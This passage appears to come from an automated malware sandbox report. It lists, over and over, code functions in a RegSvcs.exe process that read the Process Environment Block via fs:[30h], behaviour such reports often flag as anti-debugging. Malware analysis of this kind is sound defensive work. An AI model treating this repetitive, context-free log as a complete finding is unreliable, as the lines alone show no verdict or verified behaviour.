Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115245A mov eax, dword ptr fs:[00000030h]	7_2_0115245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A471 mov eax, dword ptr fs:[00000030h]	7_2_0113A471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h]	7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h]	7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h]	7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC460 mov ecx, dword ptr fs:[00000030h]	7_2_011BC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011644B0 mov ecx, dword ptr fs:[00000030h]	7_2_011644B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011264BA mov eax, dword ptr fs:[00000030h]	7_2_011264BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BA4B0 mov eax, dword ptr fs:[00000030h]	7_2_011BA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011364AB mov eax, dword ptr fs:[00000030h]	7_2_011364AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011304E5 mov ecx, dword ptr fs:[00000030h]	7_2_011304E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130710 mov eax, dword ptr fs:[00000030h]	7_2_01130710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160710 mov eax, dword ptr fs:[00000030h]	7_2_01160710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C700 mov eax, dword ptr fs:[00000030h]	7_2_0116C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116273C mov eax, dword ptr fs:[00000030h]	7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116273C mov ecx, dword ptr fs:[00000030h]	7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116273C mov eax, dword ptr fs:[00000030h]	7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AC730 mov eax, dword ptr fs:[00000030h]	7_2_011AC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C720 mov eax, dword ptr fs:[00000030h]	7_2_0116C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C720 mov eax, dword ptr fs:[00000030h]	7_2_0116C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130750 mov eax, dword ptr fs:[00000030h]	7_2_01130750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE75D mov eax, dword ptr fs:[00000030h]	7_2_011BE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172750 mov eax, dword ptr fs:[00000030h]	7_2_01172750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172750 mov eax, dword ptr fs:[00000030h]	7_2_01172750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4755 mov eax, dword ptr fs:[00000030h]	7_2_011B4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A740 mov eax, dword ptr fs:[00000030h]	7_2_0112A740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116674D mov esi, dword ptr fs:[00000030h]	7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116674D mov eax, dword ptr fs:[00000030h]	7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116674D mov eax, dword ptr fs:[00000030h]	7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138770 mov eax, dword ptr fs:[00000030h]	7_2_01138770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011307AF mov eax, dword ptr fs:[00000030h]	7_2_011307AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B07C3 mov eax, dword ptr fs:[00000030h]	7_2_011B07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C7F0 mov eax, dword ptr fs:[00000030h]	7_2_0116C7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011347FB mov eax, dword ptr fs:[00000030h]	7_2_011347FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011347FB mov eax, dword ptr fs:[00000030h]	7_2_011347FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h]	7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h]	7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h]	7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE7E1 mov eax, dword ptr fs:[00000030h]	7_2_011BE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172619 mov eax, dword ptr fs:[00000030h]	7_2_01172619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE609 mov eax, dword ptr fs:[00000030h]	7_2_011AE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E627 mov eax, dword ptr fs:[00000030h]	7_2_0114E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01166620 mov eax, dword ptr fs:[00000030h]	7_2_01166620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168620 mov eax, dword ptr fs:[00000030h]	7_2_01168620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113262C mov eax, dword ptr fs:[00000030h]	7_2_0113262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114C640 mov eax, dword ptr fs:[00000030h]	7_2_0114C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162674 mov eax, dword ptr fs:[00000030h]	7_2_01162674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A660 mov eax, dword ptr fs:[00000030h]	7_2_0116A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A660 mov eax, dword ptr fs:[00000030h]	7_2_0116A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114266C mov eax, dword ptr fs:[00000030h]	7_2_0114266C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134690 mov eax, dword ptr fs:[00000030h]	7_2_01134690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134690 mov eax, dword ptr fs:[00000030h]	7_2_01134690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C68B mov eax, dword ptr fs:[00000030h]	7_2_0116C68B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011666B0 mov eax, dword ptr fs:[00000030h]	7_2_011666B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C6A6 mov eax, dword ptr fs:[00000030h]	7_2_0116C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A6C7 mov ebx, dword ptr fs:[00000030h]	7_2_0116A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A6C7 mov eax, dword ptr fs:[00000030h]	7_2_0116A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B06F1 mov eax, dword ptr fs:[00000030h]	7_2_011B06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B06F1 mov eax, dword ptr fs:[00000030h]	7_2_011B06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC912 mov eax, dword ptr fs:[00000030h]	7_2_011BC912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128918 mov eax, dword ptr fs:[00000030h]	7_2_01128918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128918 mov eax, dword ptr fs:[00000030h]	7_2_01128918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE908 mov eax, dword ptr fs:[00000030h]	7_2_011AE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE908 mov eax, dword ptr fs:[00000030h]	7_2_011AE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B892A mov eax, dword ptr fs:[00000030h]	7_2_011B892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A950 mov eax, dword ptr fs:[00000030h]	7_2_0116A950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0946 mov eax, dword ptr fs:[00000030h]	7_2_011B0946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC97C mov eax, dword ptr fs:[00000030h]	7_2_011BC97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h]	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h]	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h]	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117096E mov eax, dword ptr fs:[00000030h]	7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117096E mov edx, dword ptr fs:[00000030h]	7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117096E mov eax, dword ptr fs:[00000030h]	7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B89B3 mov esi, dword ptr fs:[00000030h]	7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B89B3 mov eax, dword ptr fs:[00000030h]	7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B89B3 mov eax, dword ptr fs:[00000030h]	7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011309AD mov eax, dword ptr fs:[00000030h]	7_2_011309AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011309AD mov eax, dword ptr fs:[00000030h]	7_2_011309AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011649D0 mov eax, dword ptr fs:[00000030h]	7_2_011649D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011629F9 mov eax, dword ptr fs:[00000030h]	7_2_011629F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011629F9 mov eax, dword ptr fs:[00000030h]	7_2_011629F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE9E0 mov eax, dword ptr fs:[00000030h]	7_2_011BE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC810 mov eax, dword ptr fs:[00000030h]	7_2_011BC810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov ecx, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h]	7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A830 mov eax, dword ptr fs:[00000030h]	7_2_0116A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160854 mov eax, dword ptr fs:[00000030h]	7_2_01160854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134859 mov eax, dword ptr fs:[00000030h]	7_2_01134859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134859 mov eax, dword ptr fs:[00000030h]	7_2_01134859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE872 mov eax, dword ptr fs:[00000030h]	7_2_011BE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE872 mov eax, dword ptr fs:[00000030h]	7_2_011BE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC89D mov eax, dword ptr fs:[00000030h]	7_2_011BC89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130887 mov eax, dword ptr fs:[00000030h]	7_2_01130887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011428D0 mov ecx, dword ptr fs:[00000030h]	7_2_011428D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E8C0 mov eax, dword ptr fs:[00000030h]	7_2_0115E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h]	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0116C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0116C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h]	7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EB20 mov eax, dword ptr fs:[00000030h]	7_2_0115EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EB20 mov eax, dword ptr fs:[00000030h]	7_2_0115EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128B50 mov eax, dword ptr fs:[00000030h]	7_2_01128B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CB7E mov eax, dword ptr fs:[00000030h]	7_2_0112CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h]	7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h]	7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h]	7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140BBE mov eax, dword ptr fs:[00000030h]	7_2_01140BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140BBE mov eax, dword ptr fs:[00000030h]	7_2_01140BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h]	7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h]	7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h]	7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h]	7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h]	7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h]	7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168BF0 mov ecx, dword ptr fs:[00000030h]	7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168BF0 mov eax, dword ptr fs:[00000030h]	7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168BF0 mov eax, dword ptr fs:[00000030h]	7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EBFC mov eax, dword ptr fs:[00000030h]	7_2_0115EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BCBF0 mov eax, dword ptr fs:[00000030h]	7_2_011BCBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01192BF6 mov eax, dword ptr fs:[00000030h]	7_2_01192BF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BCA11 mov eax, dword ptr fs:[00000030h]	7_2_011BCA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128A00 mov eax, dword ptr fs:[00000030h]	7_2_01128A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128A00 mov eax, dword ptr fs:[00000030h]	7_2_01128A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01154A35 mov eax, dword ptr fs:[00000030h]	7_2_01154A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01154A35 mov eax, dword ptr fs:[00000030h]	7_2_01154A35
